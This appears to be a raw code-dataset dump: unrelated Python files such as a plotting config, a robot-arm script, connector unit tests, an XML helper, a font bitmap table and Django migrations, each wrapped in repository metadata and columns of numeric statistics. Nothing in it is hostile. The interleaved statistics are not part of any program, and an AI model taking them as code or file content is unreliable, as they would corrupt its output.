'wrf_benchmark_file': {'lasso_benchmark': WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2018-10-02/wrf_lasso_stats_2018-10-02.nc"}, 'sam_benchmark_file': None, 'coamps_benchmark_file': None, 'clubb_r408_benchmark_file': None, 'clubb_hoc_benchmark_file': None, 'clubb_file': None, 'wrf_file': {'zm': clubb_output_root + '/lasso_2018-10-02_zm_wrf.nc', 'zt': clubb_output_root + '/lasso_2018-10-02_zt_wrf.nc', 'sfc': clubb_output_root + '/lasso_2018-10-02_sfc_wrf.nc', 'subcolumns': clubb_output_root + '/lasso_2018-10-02_nl_lh_sample_points_2D.nc'}, 'var_groups': [VariableGroupBase, VariableGroupWs]} # DO NOT EDIT THIS LIST UNLESS YOU ARE ADDING A NEW CASE. NEVER REMOVE CASES FROM THIS LIST. # You may define a subset of cases at the end of this file. ALL_CASES = [ARM, ARM_97, ASTEX_A209, ATEX, BOMEX, CGILS_S6, CGILS_S11, CGILS_S12, CLEX9_NOV02, CLEX9_OCT14, DYCOMS2_RF01, DYCOMS2_RF01_FIXED_SST, DYCOMS2_RF02_DO, DYCOMS2_RF02_DS, DYCOMS2_RF02_DS_RESTART, DYCOMS2_RF02_ND, DYCOMS2_RF02_SO, FIRE, GABLS2, GABLS2_NIGHTLY, GABLS3, GABLS3_NIGHT, GATE_SHEAR_RLSF, # IOP, JUN25_ALTOCU, LBA, MC3E, MPACE_A, MPACE_B, MPACE_B_SILHS, NEUTRAL, NOV11_ALTOCU, RICO, RICO_SILHS, TWP_ICE, WANGARA, LASSO_20170627, LASSO_20170717, LASSO_20170728, LASSO_20170923, LASSO_20180911, LASSO_20180917, LASSO_20180918, LASSO_20181002 ] CASES_TO_PLOT = ALL_CASES # If uncommented, this line will override the real CASES_TO_PLOT given above, forcing pyplotgen to only plot some cases. # CASES_TO_PLOT = [ARM] # CASES_TO_PLOT = CASES_TO_PLOT[:3]
55.181109
135
0.56254
6,984
63,679
4.701604
0.074599
0.098368
0.078694
0.06566
0.776495
0.753624
0.713485
0.650201
0.605981
0.574705
0
0.05372
0.317122
63,679
1,153
136
55.228968
0.701391
0.061527
0
0.541152
0
0.001029
0.376039
0.146891
0
0
0
0
0
1
0
false
0
0.012346
0
0.012346
0.001029
0
0
0
null
0
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
595f827df47c5f2bdd1ecfb6bc095d61ca198a03
538
py
Python
dynaban/tests/postion.py
laukik-hase/imitation_of_human_arm_on_robotic_manipulator
995beb1ab41597ca6cbecd0baecdef1ef13450f9
[ "MIT" ]
3
2021-11-13T16:54:31.000Z
2021-11-13T20:50:18.000Z
dynaban/tests/postion.py
laukik-hase/human_arm_imitation
995beb1ab41597ca6cbecd0baecdef1ef13450f9
[ "MIT" ]
null
null
null
dynaban/tests/postion.py
laukik-hase/human_arm_imitation
995beb1ab41597ca6cbecd0baecdef1ef13450f9
[ "MIT" ]
null
null
null
#!/usr/bin/env python import arm_control_utils DURATION = 30000 TRAJ_POLY1 = [1000, 100, 100] TORQUE_POLY1 = [1000, 100, 100] MODE = 3 arm_control_utils.initialize_motors() arm_control_utils.enable_state_torque() arm_control_utils.set_debug(1, 0) print("Ready to move") arm_control_utils.set_position_trajectory(1, DURATION, TRAJ_POLY1, TORQUE_POLY1) arm_control_utils.set_mode(1, MODE) arm_control_utils.disable_state_torque() arm_control_utils.stop_motors()
28.315789
80
0.702602
74
538
4.702703
0.445946
0.229885
0.344828
0.155172
0.149425
0
0
0
0
0
0
0.08
0.210037
538
19
81
28.315789
0.738824
0.037175
0
0
0
0
0.025097
0
0
0
0
0
0
1
0
false
0
0.076923
0
0.076923
0.076923
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
595fa12df823f48a76595c65b488cfd3266708e8
5,758
py
Python
google-datacatalog-connectors-commons/tests/google/datacatalog_connectors/commons/prepare/base_entry_factory_test.py
mesmacosta/datacatalog-connectors
74a4b6272cb00f2831b669d1a41133913f3df3fa
[ "Apache-2.0" ]
53
2020-04-27T21:50:47.000Z
2022-02-18T22:08:49.000Z
google-datacatalog-connectors-commons/tests/google/datacatalog_connectors/commons/prepare/base_entry_factory_test.py
mesmacosta/datacatalog-connectors
74a4b6272cb00f2831b669d1a41133913f3df3fa
[ "Apache-2.0" ]
20
2020-05-26T13:51:45.000Z
2022-01-25T00:06:19.000Z
google-datacatalog-connectors-commons/tests/google/datacatalog_connectors/commons/prepare/base_entry_factory_test.py
mesmacosta/datacatalog-connectors
74a4b6272cb00f2831b669d1a41133913f3df3fa
[ "Apache-2.0" ]
12
2020-04-30T22:14:02.000Z
2021-10-09T03:44:39.000Z
#!/usr/bin/python # coding=utf-8 # # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest import mock from google.datacatalog_connectors.commons import prepare class BaseEntryFactoryTestCase(unittest.TestCase): __COMMONS_PACKAGE = 'google.datacatalog_connectors.commons' __PREPARE_PACKAGE = '{}.prepare'.format(__COMMONS_PACKAGE) def test_format_id_should_normalize_non_compliant_id(self): formatted_id = prepare.BaseEntryFactory._format_id(u'ã123 - b456 ') self.assertEqual('a123_b456', formatted_id) def test_format_id_with_hashing_should_normalize_non_compliant_id(self): long_str = 'organization_warehouse7192ecb2__personsc3a8d512_' \ 'business_area_and_segment_of_marketing' expected_str = 'organization_warehouse7192ecb2_personsc3a8d512_' \ 'business_7074c286' formatted_id = prepare.BaseEntryFactory._format_id_with_hashing( long_str, hash_length=8) self.assertEqual(expected_str, formatted_id) def test_format_id_with_provided_pattern_should_normalize_non_compliant_id( # noqa: E501 self): long_str = 'organization__warehouse7192ecb2__personsc3a8d512_' \ 'business_area_and_segment_of_marketing' expected_str = 'organization__warehouse7192ecb2_' \ '_personsc3a8d512_businesa4f7e655' formatted_id = prepare.BaseEntryFactory._format_id_with_hashing( long_str, regex_pattern=r'[^a-zA-Z0-9_]+') self.assertEqual(expected_str, formatted_id) def test_format_display_name_should_normalize_non_compliant_name(self): formatted_name = prepare.BaseEntryFactory._format_display_name( u'ã123 :?: b456 ') self.assertEqual('a123 _ b456', formatted_name) @mock.patch( '{}.DataCatalogStringsHelper.truncate_string'.format(__PREPARE_PACKAGE) ) def test_format_linked_resource_should_not_normalize_compliant_string( self, mock_truncate_string): # Return same value received. mock_truncate_string.side_effect = (lambda *args: args[0]) formatted_linked_resource = prepare.BaseEntryFactory.\ _format_linked_resource( 'hdfs://namenode:8020/user/hive/warehouse/table_company' '_names_from_department_that_keeps_records_with_' 'historical_data_from_every_single_member') self.assertEqual( 'hdfs://namenode:8020/user/hive/warehouse/' 'table_company_names_from_department_that_' 'keeps_records_with_historical_data_' 'from_every_single_member', formatted_linked_resource) @mock.patch( '{}.DataCatalogStringsHelper.truncate_string'.format(__PREPARE_PACKAGE) ) def test_format_linked_resource_should_normalize_non_compliant_string( self, mock_truncate_string): # Return same value received. mock_truncate_string.side_effect = (lambda *args: args[0]) formatted_linked_resource = prepare.BaseEntryFactory. \ _format_linked_resource( 'hdfs://[namenode]:8020/user/{hive}/[warehouse]/table_company' '_names_from_?department?_that_;keeps;_records_with_' 'historical_data_from_every_single_member') self.assertEqual( 'hdfs://_namenode_:8020/user/' '_hive_/_warehouse_/table_company_names_from' '__department__that__keeps__records_with_' 'historical_data_from_every_single_member', formatted_linked_resource) @mock.patch( '{}.DataCatalogStringsHelper.truncate_string'.format(__PREPARE_PACKAGE) ) def test_format_linked_resource_should_not_normalize_non_compliant_string( self, mock_truncate_string): # Return same value received. mock_truncate_string.side_effect = (lambda *args: args[0]) formatted_linked_resource = prepare.BaseEntryFactory. \ _format_linked_resource( 'hdfs://[namenode]:8020/user/{hive}/[warehouse]/table_company' '_names_from_?department?_that_;keeps;_records_with_' 'historical_data_from_every_single_member', False) self.assertEqual( 'hdfs://[namenode]:8020/user/{hive}/[warehouse]/table_company' '_names_from_?department?_that_;keeps;_records_with_' 'historical_data_from_every_single_member', formatted_linked_resource) @mock.patch( '{}.DataCatalogStringsHelper.truncate_string'.format(__PREPARE_PACKAGE) ) def test_format_linked_resource_should_truncate_non_compliant_string( self, mock_truncate_string): expected_value = 'truncated_str...' mock_truncate_string.return_value = expected_value formatted_linked_resource = prepare.BaseEntryFactory. \ _format_linked_resource( 'hdfs://[namenode]:8020/user/{hive}/[warehouse]/table_company' '_names_from_?department?_that_;keeps;_records_with_' 'historical_data_from_every_single_member') self.assertEqual(expected_value, formatted_linked_resource)
42.029197
93
0.70719
620
5,758
6.058065
0.253226
0.059638
0.027689
0.037274
0.750532
0.727636
0.699947
0.682109
0.660277
0.633653
0
0.026955
0.213963
5,758
136
94
42.338235
0.802916
0.116881
0
0.51087
0
0
0.322804
0.302073
0
0
0
0
0.086957
1
0.086957
false
0
0.032609
0
0.152174
0
0
0
0
null
0
0
0
0
1
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
5962222919ba8cf295722ccc3d990ff5fdab4dcc
1,704
py
Python
ota_xml_api/util/xml_base.py
mihira/opentravel-xml-api
24d1ea4d24cf2575de474becaa665f6fc0d1971d
[ "MIT" ]
3
2016-01-14T01:12:06.000Z
2021-04-16T04:00:47.000Z
ota_xml_api/util/xml_base.py
mihira/opentravel-xml-api
24d1ea4d24cf2575de474becaa665f6fc0d1971d
[ "MIT" ]
null
null
null
ota_xml_api/util/xml_base.py
mihira/opentravel-xml-api
24d1ea4d24cf2575de474becaa665f6fc0d1971d
[ "MIT" ]
2
2017-09-04T13:02:09.000Z
2018-06-09T11:10:03.000Z
#!/usr/bin/env python """ This module contains the base xml Node and Period classes """ from xml.dom.minidom import getDOMImplementation from date import Period from constants import START, END class XmlNode(object): """ the name of the class will define the name of the node by default. classes inheriting this class will have their name set. """ _impl = getDOMImplementation() def __init__(self, name=None, **attributes): if not name: name = self.__class__.__name__ self._doc = XmlNode._impl.createDocument(None, name, None) self.element = self._doc.documentElement for key, value in attributes.items(): self.set_attribute(key, value) self.parent = None def set_attribute(self, key, value): self.element.setAttribute(key, str(value)) def set_parent(self, parent_node): self.parent = parent_node def add_child(self, child_node): child_node.set_parent(self) self.element.appendChild(child_node.element) return child_node def add_text(self, data): text = self._doc.createTextNode(data) self.element.appendChild(text) return text def __repr__(self): return self.element.toxml() class PeriodNode(XmlNode): def __init__(self, *args, **kwargs): XmlNode.__init__(self, *args, **kwargs) self._period = None self.set_period(Period()) def get_period(self): return self._period def set_period(self, period): self.set_attribute(START, period.start) self.set_attribute(END, period.end) self._period = period period = property(get_period, set_period)
27.483871
70
0.661385
215
1,704
5.004651
0.330233
0.051115
0.04461
0.022305
0
0
0
0
0
0
0
0
0.242958
1,704
61
71
27.934426
0.834109
0.117958
0
0
0
0
0
0
0
0
0
0
0
1
0.230769
false
0
0.076923
0.051282
0.512821
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
5986324fbdcbaeae05e084715dcadf5d8b4991a3
1,199
py
Python
app/stages/management/commands/import_stages_from_csv.py
guilloulouis/stage_medecine
7ec9067402e510d812a375bbfe46f2ab545587f9
[ "MIT" ]
null
null
null
app/stages/management/commands/import_stages_from_csv.py
guilloulouis/stage_medecine
7ec9067402e510d812a375bbfe46f2ab545587f9
[ "MIT" ]
null
null
null
app/stages/management/commands/import_stages_from_csv.py
guilloulouis/stage_medecine
7ec9067402e510d812a375bbfe46f2ab545587f9
[ "MIT" ]
1
2021-04-30T16:38:19.000Z
2021-04-30T16:38:19.000Z
# from django.core.management import BaseCommand # import pandas as pd # # from stages.models import Category, Stage # # # class Command(BaseCommand): # help = 'Import a list of stage in the database' # # def add_arguments(self, parser): # super(Command, self).add_arguments(parser) # parser.add_argument( # '--csv', dest='csv', default=None, # help='Specify the csv file to parse', # ) # # def handle(self, *args, **options): # csv = options.get('csv') # csv_reader = pd.read_csv(csv) # stages_to_create = [] # for index, item in csv_reader.iterrows(): # stage_raw = item['Stage'] # split = stage_raw.split('(') # stage_name = split[0].strip() # if len(split) > 1: # category_name = split[1].replace(')', '').strip() # category_object, created = Category.objects.get_or_create(name=category_name) # else: # category_object = None # stages_to_create.append(Stage(name=stage_name, place_max=item['places'], category=category_object)) # Stage.objects.bulk_create(stages_to_create)
37.46875
113
0.584654
139
1,199
4.863309
0.482014
0.035503
0.06213
0
0
0
0
0
0
0
0
0.003488
0.282736
1,199
31
114
38.677419
0.782558
0.947456
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
2
59a09df4f04358386749f3598f84da0352793936
189
py
Python
venv/Lib/site-packages/shiboken2/_config.py
gabistoian/Hide-Text-in-image
88b5ef0bd2bcb0e222cfbc7abf6ac2b869f72ec5
[ "X11" ]
null
null
null
venv/Lib/site-packages/shiboken2/_config.py
gabistoian/Hide-Text-in-image
88b5ef0bd2bcb0e222cfbc7abf6ac2b869f72ec5
[ "X11" ]
null
null
null
venv/Lib/site-packages/shiboken2/_config.py
gabistoian/Hide-Text-in-image
88b5ef0bd2bcb0e222cfbc7abf6ac2b869f72ec5
[ "X11" ]
null
null
null
shiboken_library_soversion = str(5.15) version = "5.15.2.1" version_info = (5, 15, 2.1, "", "") __build_date__ = '2022-01-07T13:13:47+00:00' __setup_py_package_version__ = '5.15.2.1'
15.75
44
0.671958
34
189
3.294118
0.617647
0.107143
0.107143
0.133929
0.214286
0
0
0
0
0
0
0.219512
0.132275
189
11
45
17.181818
0.463415
0
0
0
0
0
0.216931
0.132275
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
59ac4ecc150b88338555999e74b36af7366e76c2
271
py
Python
method/boardInfo.py
gary920209/LightDance-RPi
41d3ef536f3874fd5dbe092f5c9be42f7204427d
[ "MIT" ]
2
2020-11-14T17:13:55.000Z
2020-11-14T17:42:39.000Z
method/boardInfo.py
gary920209/LightDance-RPi
41d3ef536f3874fd5dbe092f5c9be42f7204427d
[ "MIT" ]
null
null
null
method/boardInfo.py
gary920209/LightDance-RPi
41d3ef536f3874fd5dbe092f5c9be42f7204427d
[ "MIT" ]
null
null
null
import os from .baseMethod import BaseMethod # BoardInfo class BoardInfo(BaseMethod): def method(self, payload): info = [ "boardInfo", {"name": os.name, "type": "dancer", "OK": True, "msg": "Success"}, ] return info
19.357143
78
0.553506
27
271
5.555556
0.703704
0
0
0
0
0
0
0
0
0
0
0
0.306273
271
13
79
20.846154
0.797872
0.03321
0
0
0
0
0.134615
0
0
0
0
0
0
1
0.111111
false
0
0.222222
0
0.555556
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
59afd173c9893de34534a54b0f3445d6fe88b945
7,189
py
Python
fonts/Org_01.py
cnobile2012/Python-TFT
812a87e6f694eae338c3d9579ea98eae636f8f99
[ "MIT" ]
null
null
null
fonts/Org_01.py
cnobile2012/Python-TFT
812a87e6f694eae338c3d9579ea98eae636f8f99
[ "MIT" ]
null
null
null
fonts/Org_01.py
cnobile2012/Python-TFT
812a87e6f694eae338c3d9579ea98eae636f8f99
[ "MIT" ]
null
null
null
# Org_v01 by Orgdot (www.orgdot.com/aliasfonts). A tiny, # stylized font with all characters within a 6 pixel height. Org_01Bitmaps = [ 0xE8, 0xA0, 0x57, 0xD5, 0xF5, 0x00, 0xFD, 0x3E, 0x5F, 0x80, 0x88, 0x88, 0x88, 0x80, 0xF4, 0xBF, 0x2E, 0x80, 0x80, 0x6A, 0x40, 0x95, 0x80, 0xAA, 0x80, 0x5D, 0x00, 0xC0, 0xF0, 0x80, 0x08, 0x88, 0x88, 0x00, 0xFC, 0x63, 0x1F, 0x80, 0xF8, 0xF8, 0x7F, 0x0F, 0x80, 0xF8, 0x7E, 0x1F, 0x80, 0x8C, 0x7E, 0x10, 0x80, 0xFC, 0x3E, 0x1F, 0x80, 0xFC, 0x3F, 0x1F, 0x80, 0xF8, 0x42, 0x10, 0x80, 0xFC, 0x7F, 0x1F, 0x80, 0xFC, 0x7E, 0x1F, 0x80, 0x90, 0xB0, 0x2A, 0x22, 0xF0, 0xF0, 0x88, 0xA8, 0xF8, 0x4E, 0x02, 0x00, 0xFD, 0x6F, 0x0F, 0x80, 0xFC, 0x7F, 0x18, 0x80, 0xF4, 0x7D, 0x1F, 0x00, 0xFC, 0x21, 0x0F, 0x80, 0xF4, 0x63, 0x1F, 0x00, 0xFC, 0x3F, 0x0F, 0x80, 0xFC, 0x3F, 0x08, 0x00, 0xFC, 0x2F, 0x1F, 0x80, 0x8C, 0x7F, 0x18, 0x80, 0xF9, 0x08, 0x4F, 0x80, 0x78, 0x85, 0x2F, 0x80, 0x8D, 0xB1, 0x68, 0x80, 0x84, 0x21, 0x0F, 0x80, 0xFD, 0x6B, 0x5A, 0x80, 0xFC, 0x63, 0x18, 0x80, 0xFC, 0x63, 0x1F, 0x80, 0xFC, 0x7F, 0x08, 0x00, 0xFC, 0x63, 0x3F, 0x80, 0xFC, 0x7F, 0x29, 0x00, 0xFC, 0x3E, 0x1F, 0x80, 0xF9, 0x08, 0x42, 0x00, 0x8C, 0x63, 0x1F, 0x80, 0x8C, 0x62, 0xA2, 0x00, 0xAD, 0x6B, 0x5F, 0x80, 0x8A, 0x88, 0xA8, 0x80, 0x8C, 0x54, 0x42, 0x00, 0xF8, 0x7F, 0x0F, 0x80, 0xEA, 0xC0, 0x82, 0x08, 0x20, 0x80, 0xD5, 0xC0, 0x54, 0xF8, 0x80, 0xF1, 0xFF, 0x8F, 0x99, 0xF0, 0xF8, 0x8F, 0x1F, 0x99, 0xF0, 0xFF, 0x8F, 0x6B, 0xA4, 0xF9, 0x9F, 0x10, 0x8F, 0x99, 0x90, 0xF0, 0x55, 0xC0, 0x8A, 0xF9, 0x90, 0xF8, 0xFD, 0x63, 0x10, 0xF9, 0x99, 0xF9, 0x9F, 0xF9, 0x9F, 0x80, 0xF9, 0x9F, 0x20, 0xF8, 0x88, 0x47, 0x1F, 0x27, 0xC8, 0x42, 0x00, 0x99, 0x9F, 0x99, 0x97, 0x8C, 0x6B, 0xF0, 0x96, 0x69, 0x99, 0x9F, 0x10, 0x2E, 0x8F, 0x2B, 0x22, 0xF8, 0x89, 0xA8, 0x0F, 0xE0 ] Org_01Glyphs = [ [ 0, 0, 0, 6, 0, 1 ], # 0x20 ' ' [ 0, 1, 5, 2, 0, -4 ], # 0x21 '!' [ 1, 3, 1, 4, 0, -4 ], # 0x22 '"' [ 2, 5, 5, 6, 0, -4 ], # 0x23 '#' [ 6, 5, 5, 6, 0, -4 ], # 0x24 '$' [ 10, 5, 5, 6, 0, -4 ], # 0x25 '%' [ 14, 5, 5, 6, 0, -4 ], # 0x26 '&' [ 18, 1, 1, 2, 0, -4 ], # 0x27 ''' [ 19, 2, 5, 3, 0, -4 ], # 0x28 '(' [ 21, 2, 5, 3, 0, -4 ], # 0x29 ')' [ 23, 3, 3, 4, 0, -3 ], # 0x2A '#' [ 25, 3, 3, 4, 0, -3 ], # 0x2B '+' [ 27, 1, 2, 2, 0, 0 ], # 0x2C ',' [ 28, 4, 1, 5, 0, -2 ], # 0x2D '-' [ 29, 1, 1, 2, 0, 0 ], # 0x2E '.' [ 30, 5, 5, 6, 0, -4 ], # 0x2F '/' [ 34, 5, 5, 6, 0, -4 ], # 0x30 '0' [ 38, 1, 5, 2, 0, -4 ], # 0x31 '1' [ 39, 5, 5, 6, 0, -4 ], # 0x32 '2' [ 43, 5, 5, 6, 0, -4 ], # 0x33 '3' [ 47, 5, 5, 6, 0, -4 ], # 0x34 '4' [ 51, 5, 5, 6, 0, -4 ], # 0x35 '5' [ 55, 5, 5, 6, 0, -4 ], # 0x36 '6' [ 59, 5, 5, 6, 0, -4 ], # 0x37 '7' [ 63, 5, 5, 6, 0, -4 ], # 0x38 '8' [ 67, 5, 5, 6, 0, -4 ], # 0x39 '9' [ 71, 1, 4, 2, 0, -3 ], # 0x3A ':' [ 72, 1, 4, 2, 0, -3 ], # 0x3B '' [ 73, 3, 5, 4, 0, -4 ], # 0x3C '<' [ 75, 4, 3, 5, 0, -3 ], # 0x3D '=' [ 77, 3, 5, 4, 0, -4 ], # 0x3E '>' [ 79, 5, 5, 6, 0, -4 ], # 0x3F '?' [ 83, 5, 5, 6, 0, -4 ], # 0x40 '@' [ 87, 5, 5, 6, 0, -4 ], # 0x41 'A' [ 91, 5, 5, 6, 0, -4 ], # 0x42 'B' [ 95, 5, 5, 6, 0, -4 ], # 0x43 'C' [ 99, 5, 5, 6, 0, -4 ], # 0x44 'D' [ 103, 5, 5, 6, 0, -4 ], # 0x45 'E' [ 107, 5, 5, 6, 0, -4 ], # 0x46 'F' [ 111, 5, 5, 6, 0, -4 ], # 0x47 'G' [ 115, 5, 5, 6, 0, -4 ], # 0x48 'H' [ 119, 5, 5, 6, 0, -4 ], # 0x49 'I' [ 123, 5, 5, 6, 0, -4 ], # 0x4A 'J' [ 127, 5, 5, 6, 0, -4 ], # 0x4B 'K' [ 131, 5, 5, 6, 0, -4 ], # 0x4C 'L' [ 135, 5, 5, 6, 0, -4 ], # 0x4D 'M' [ 139, 5, 5, 6, 0, -4 ], # 0x4E 'N' [ 143, 5, 5, 6, 0, -4 ], # 0x4F 'O' [ 147, 5, 5, 6, 0, -4 ], # 0x50 'P' [ 151, 5, 5, 6, 0, -4 ], # 0x51 'Q' [ 155, 5, 5, 6, 0, -4 ], # 0x52 'R' [ 159, 5, 5, 6, 0, -4 ], # 0x53 'S' [ 163, 5, 5, 6, 0, -4 ], # 0x54 'T' [ 167, 5, 5, 6, 0, -4 ], # 0x55 'U' [ 171, 5, 5, 6, 0, -4 ], # 0x56 'V' [ 175, 5, 5, 6, 0, -4 ], # 0x57 'W' [ 179, 5, 5, 6, 0, -4 ], # 0x58 'X' [ 183, 5, 5, 6, 0, -4 ], # 0x59 'Y' [ 187, 5, 5, 6, 0, -4 ], # 0x5A 'Z' [ 191, 2, 5, 3, 0, -4 ], # 0x5B '[' [ 193, 5, 5, 6, 0, -4 ], # 0x5C '\' [ 197, 2, 5, 3, 0, -4 ], # 0x5D ']' [ 199, 3, 2, 4, 0, -4 ], # 0x5E '^' [ 200, 5, 1, 6, 0, 1 ], # 0x5F '_' [ 201, 1, 1, 2, 0, -4 ], # 0x60 '`' [ 202, 4, 4, 5, 0, -3 ], # 0x61 'a' [ 204, 4, 5, 5, 0, -4 ], # 0x62 'b' [ 207, 4, 4, 5, 0, -3 ], # 0x63 'c' [ 209, 4, 5, 5, 0, -4 ], # 0x64 'd' [ 212, 4, 4, 5, 0, -3 ], # 0x65 'e' [ 214, 3, 5, 4, 0, -4 ], # 0x66 'f' [ 216, 4, 5, 5, 0, -3 ], # 0x67 'g' [ 219, 4, 5, 5, 0, -4 ], # 0x68 'h' [ 222, 1, 4, 2, 0, -3 ], # 0x69 'i' [ 223, 2, 5, 3, 0, -3 ], # 0x6A 'j' [ 225, 4, 5, 5, 0, -4 ], # 0x6B 'k' [ 228, 1, 5, 2, 0, -4 ], # 0x6C 'l' [ 229, 5, 4, 6, 0, -3 ], # 0x6D 'm' [ 232, 4, 4, 5, 0, -3 ], # 0x6E 'n' [ 234, 4, 4, 5, 0, -3 ], # 0x6F 'o' [ 236, 4, 5, 5, 0, -3 ], # 0x70 'p' [ 239, 4, 5, 5, 0, -3 ], # 0x71 'q' [ 242, 4, 4, 5, 0, -3 ], # 0x72 'r' [ 244, 4, 4, 5, 0, -3 ], # 0x73 's' [ 246, 5, 5, 6, 0, -4 ], # 0x74 't' [ 250, 4, 4, 5, 0, -3 ], # 0x75 'u' [ 252, 4, 4, 5, 0, -3 ], # 0x76 'v' [ 254, 5, 4, 6, 0, -3 ], # 0x77 'w' [ 257, 4, 4, 5, 0, -3 ], # 0x78 'x' [ 259, 4, 5, 5, 0, -3 ], # 0x79 'y' [ 262, 4, 4, 5, 0, -3 ], # 0x7A 'z' [ 264, 3, 5, 4, 0, -4 ], # 0x7B '[' [ 266, 1, 5, 2, 0, -4 ], # 0x7C '|' [ 267, 3, 5, 4, 0, -4 ], # 0x7D ']' [ 269, 5, 3, 6, 0, -3 ] ] # 0x7E '~' Org_01 = [ Org_01Bitmaps, Org_01Glyphs, 0x20, 0x7E, 7 ] # Approx. 943 bytes
54.462121
75
0.335791
1,034
7,189
2.327853
0.281431
0.054009
0.05484
0.07312
0.176568
0
0
0
0
0
0
0.422303
0.461121
7,189
131
76
54.877863
0.199019
0.136876
0
0
0
0
0
0
0
0
0.178899
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
59c07712f78b8701ce24892262492a52ef344906
278
py
Python
src/sftp/sftp_handle.py
IntercraftMC/intercraft-sftp
6b8a4e0f94fa5708a10b0239059c7e61d39e4b0f
[ "MIT" ]
null
null
null
src/sftp/sftp_handle.py
IntercraftMC/intercraft-sftp
6b8a4e0f94fa5708a10b0239059c7e61d39e4b0f
[ "MIT" ]
2
2019-03-05T14:07:36.000Z
2019-03-08T02:00:37.000Z
src/sftp/sftp_handle.py
IntercraftMC/intercraft-sftp
6b8a4e0f94fa5708a10b0239059c7e61d39e4b0f
[ "MIT" ]
null
null
null
import os import paramiko class SftpHandle(paramiko.SFTPHandle): def stat(self): try: return paramiko.SFTPAttributes.from_stat(os.fstat(self.readfile.fileno())) except OSError as e: return paramiko.SFTPServer.convert_errno(e.errno) def chattr(self, attr): pass
19.857143
77
0.758993
38
278
5.5
0.657895
0.133971
0
0
0
0
0
0
0
0
0
0
0.136691
278
13
78
21.384615
0.870833
0
0
0
0
0
0
0
0
0
0
0
0
1
0.2
false
0.1
0.2
0
0.7
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
59cb4b5a7e4e4de46f30f0ecb9a11b2447b40fad
884
py
Python
web/core/migrations/0089_auto_20201118_1234.py
MTES-MCT/biocarburants
ff084916e18cdbdc41400f36fa6cc76a5e05900e
[ "MIT" ]
4
2020-03-22T18:13:12.000Z
2021-01-25T10:33:31.000Z
web/core/migrations/0089_auto_20201118_1234.py
MTES-MCT/carbure
2876756b760ab4866fa783bb40e61a046eebb1ab
[ "MIT" ]
20
2020-07-06T14:33:14.000Z
2022-03-15T16:54:17.000Z
web/core/migrations/0089_auto_20201118_1234.py
MTES-MCT/biocarburants
ff084916e18cdbdc41400f36fa6cc76a5e05900e
[ "MIT" ]
4
2020-04-03T12:19:12.000Z
2021-06-15T12:20:57.000Z
# Generated by Django 3.0.7 on 2020-11-18 11:34 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('core', '0088_matierepremiere_is_huile_vegetale'), ] operations = [ migrations.AddField( model_name='depot', name='address', field=models.CharField(default='', max_length=128), preserve_default=False, ), migrations.AddField( model_name='depot', name='ownership_type', field=models.CharField(choices=[('OWN', 'Propre'), ('THIRD_PARTY', 'Tiers')], default='THIRD_PARTY', max_length=32), ), migrations.AddField( model_name='depot', name='postal_code', field=models.CharField(default='', max_length=32), preserve_default=False, ), ]
28.516129
128
0.578054
88
884
5.625
0.568182
0.109091
0.139394
0.163636
0.363636
0.363636
0
0
0
0
0
0.041534
0.291855
884
30
129
29.466667
0.749201
0.050905
0
0.458333
1
0
0.149343
0.0454
0
0
0
0
0
1
0
false
0
0.041667
0
0.166667
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
ab72dffbafe60c111d8d185e2a4e9e3c45bff202
3,763
py
Python
utils/clustergen.py
lanhin/TripletRun
06f73a6911fae2f9874bed8f9d68bf0d3fd5e973
[ "MIT" ]
15
2019-03-22T16:07:53.000Z
2021-07-31T03:22:34.000Z
utils/clustergen.py
lanhin/TripletRun
06f73a6911fae2f9874bed8f9d68bf0d3fd5e973
[ "MIT" ]
null
null
null
utils/clustergen.py
lanhin/TripletRun
06f73a6911fae2f9874bed8f9d68bf0d3fd5e973
[ "MIT" ]
2
2018-05-23T08:30:39.000Z
2020-08-28T11:13:40.000Z
